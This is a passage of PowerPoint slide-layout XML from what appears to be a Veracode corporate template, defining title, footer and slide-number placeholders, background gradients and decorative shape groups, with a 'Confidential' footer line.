                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E60D4F2C-5963-4E5E-2EBF-DD42B97B795E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259186830"/>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4_Title_Dark_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="43000">
              <a:srgbClr val="007EA2"/>
            </a:gs>
            <a:gs pos="1000">
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="99000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="8100000" scaled="1"/>
          <a:tileRect/>
        </a:gra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8DE3857-C9AB-F3DB-4001-0886EB857CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9497086" y="-12415"/>
            <a:ext cx="2694914" cy="6882829"/>
            <a:chOff x="5796289" y="-63014"/>
            <a:chExt cx="2721059" cy="6949602"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="76000">
                <a:schemeClr val="accent4">
                  <a:alpha val="10281"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="463" name="Group 462">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069C532D-1E38-81FA-83A3-375C4536C4F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="641440"/>
              <a:ext cx="2721059" cy="1362196"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="1362196"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="464" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD256094-2693-A35F-CC1C-F8A35B7F6200}"/>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65" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2296A149-A69D-76C6-9FCC-08A109691400}"/>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66" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1830890-73C8-7E79-A35E-4AFCA82BBEC1}"/>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82" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F575B5B2-855A-AA91-E410-B8AD4A103F7E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6936261" y="1992224"/>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83" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06A9C11-F917-4953-DF18-3E1892F302B1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7861538" y="1992224"/>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477" name="Group 476">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02203CE-B363-63EF-B9C2-93A31CB1D853}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="-63014"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="478" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F536C978-A71C-D0E5-0BB1-5F6D0279D535}"/>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79" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05F99FD-76B3-D361-E17F-06D2FD629C61}"/>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80" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49EDA22B-2E76-9794-FBC6-AEF51604347B}"/>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485" name="Group 484">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D5F0EC-0C97-0452-BA25-0391E3A0042B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2037908"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="486" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78073BAF-B776-B8B2-A97F-AEF5C163523A}"/>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87" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2043221B-4850-2F04-AE08-EED1A1080FE4}"/>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88" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50F14B7-3635-6261-C251-2F4C782946C8}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="Graphic 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3ABEB2-5192-BEAA-3D88-643F1623D83D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5796289" y="1339674"/>
              <a:ext cx="870505" cy="659272"/>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nvGrpSpPr>
            <p:cNvPr id="496" name="Group 495">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA76DD7-4B64-5648-8707-CB49AA2C9552}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="3434376"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="497" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D05BA6F-8FA3-12B8-1510-B4CB6B143946}"/>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98" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B719725F-1058-C7CF-78FD-8F87EB668E8A}"/>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99" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3E1150-070A-0F77-B94D-99332969B506}"/>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04" name="Group 503">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32CF890E-1227-81D3-EE7F-DDF7D3BB767C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2736142"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="505" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9D8EEE-5120-AF68-F089-4CB55CDF3CD6}"/>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06" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8427990E-DEBA-6E62-3987-814189786493}"/>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07" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E6C371E-194A-D4E3-FEC0-AD6F826DB110}"/>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12" name="Group 511">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C443C7E-300F-5567-646E-47BADFD0653A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4830844"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="513" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A116024-7CED-ABC2-AEAE-B2AF0655A0FE}"/>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14" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D350D5-C214-7E68-0E2F-775ACBAE20E9}"/>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15" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63316F3C-2081-BD52-54C2-050E2D942777}"/>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20" name="Group 519">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7944809E-531C-AA50-D0C7-D2D338C5371B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4132610"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="521" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{114A3463-3F96-D1FF-756C-4E740A5E5403}"/>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22" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E67210-D385-AA24-D5A0-0BA7F46D3EEF}"/>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23" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7A979A-48F2-7DD3-D200-FA8013C0BAB3}"/>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28" name="Group 527">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08321C2C-931E-FC12-38E0-FEF961DB1BE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="6227315"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="529" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B248FD-6035-4329-0928-424BEDDE385C}"/>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0" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804BEE8A-8DFF-D7D3-6C22-5C2AEEB5E5DC}"/>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1" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC0963D-5C01-4CB6-3082-206B155FC908}"/>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36" name="Group 535">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55029D81-4C96-BD14-DFBB-CE03171FC56F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="5529078"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="537" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE803A4-BEE5-217F-E1D9-528AE18DB9F1}"/>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8" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD21D53C-E40B-8058-46DA-F5278A5C6BBC}"/>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9" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2891D088-3BFB-A866-90DE-1E3D07E9B6A2}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEF06BE-6D56-6DE1-1406-2D924A8A8F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446E67FC-D985-4C9C-FC71-5E1FAD303C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC24D22-4039-6DBA-5E56-0310E75D1EA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182970436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ntent_Dark_BLANK">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="6207841" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139620856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_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>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chemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBAE7429-594E-42A1-A5E3-FEB03FABFA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="307640"/>
            <a:ext cx="11472725" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0F0C6E-037F-4AF5-39C1-B85E894D0F5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26649" y="285688"/>
            <a:ext cx="124185" cy="710850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
